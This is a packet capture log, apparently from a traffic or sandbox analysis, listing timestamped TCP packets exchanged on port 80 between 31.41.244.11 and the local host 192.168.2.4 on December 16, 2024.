                                                                                                                                                                                              Dec 16, 2024 01:01:28.322153091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.322196960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.322208881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.322251081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.322910070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.323024988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.323024988 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.323062897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.323762894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.323810101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.323884964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.324055910 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.324596882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.324646950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.324687958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.324731112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.325432062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.325578928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.325607061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.325622082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.326289892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.326345921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.326401949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.326451063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.327110052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.327159882 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.327198029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.327239037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.327959061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328018904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328068018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328111887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328800917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328856945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328893900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.328941107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.332679987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.332725048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333091021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333117962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333137035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333147049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333153963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333158016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333174944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333180904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333194017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333204985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333224058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.333256960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426084995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426107883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426139116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426166058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426199913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426258087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.426297903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.427031994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.427139044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.427184105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.427856922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.427900076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.427946091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.428139925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483333111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483355045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483376026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483414888 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483442068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483479023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.483592987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.484194040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.484245062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.484291077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.484337091 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485027075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485076904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485115051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485155106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485650063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485702038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485714912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.485755920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.486495972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.486608028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.486651897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.487323046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.487366915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.487415075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.487456083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.488152981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.488197088 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.488255024 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.488500118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.488990068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.489037991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.489094019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.489190102 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.489837885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.489914894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.489983082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.490175009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.490705967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.490782976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.490783930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.490833998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.491523981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.491576910 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.491617918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.491662025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.492351055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.492469072 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.492517948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.493185043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.493268013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.493308067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.493354082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494062901 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494112015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494158983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494262934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494895935 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494942904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.494988918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.495301962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.495712042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.495848894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.495893955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.496566057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.496624947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.496670008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.496728897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.497399092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.497447968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.497500896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.497744083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.498245955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.498339891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.498383999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.499068975 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.499113083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.499135971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.499178886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.499916077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.499960899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.500009060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.500061989 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.500808954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.500864029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.500884056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.500924110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.501604080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.501648903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.501701117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.501739025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.502456903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.502506971 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.502727985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.502789021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.503309965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.503371954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.503413916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.503487110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.504156113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.504206896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.504254103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.504297972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.504955053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505001068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505045891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505085945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505800962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505896091 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505906105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.505944967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.506633043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.506685972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.506730080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.506782055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.507461071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.507512093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.507554054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.507601023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.508306026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.508373022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.508419037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.508495092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.509146929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.509195089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.509262085 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.509315014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.509999037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.510045052 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.510081053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.510118961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.510865927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.510912895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.510945082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.511074066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.511676073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.511790037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.511792898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.511835098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.512506962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.512562037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.512608051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.512648106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.513376951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.513423920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.513463020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.513505936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.514193058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.514234066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.514283895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.514324903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515033007 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515084982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515124083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515172005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515866041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515914917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.515970945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.516017914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.516709089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.516769886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.516817093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.516858101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.517559052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.517611980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.517702103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.517857075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.518388033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.518431902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.518476963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.518564939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.519218922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.519337893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.519366980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.519382954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.520072937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.520121098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.520179987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.520370960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.520948887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.520993948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.521020889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.521106005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.521739960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.521786928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.521853924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.521915913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.522584915 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.522628069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.522674084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.522846937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.523443937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.523500919 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.523564100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.523607016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.524247885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.524379015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618274927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618299961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618328094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618343115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618612051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618643045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618659973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.618678093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.619401932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.619448900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.619451046 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.619492054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.620160103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.620251894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.676938057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.676964045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.676987886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.677001953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.677126884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.677166939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.677436113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.677463055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.677505970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678248882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678275108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678308010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678325891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678910017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678947926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.678992987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.679497004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.679631948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.679675102 CET804980031.41.244.11192.168.2.4
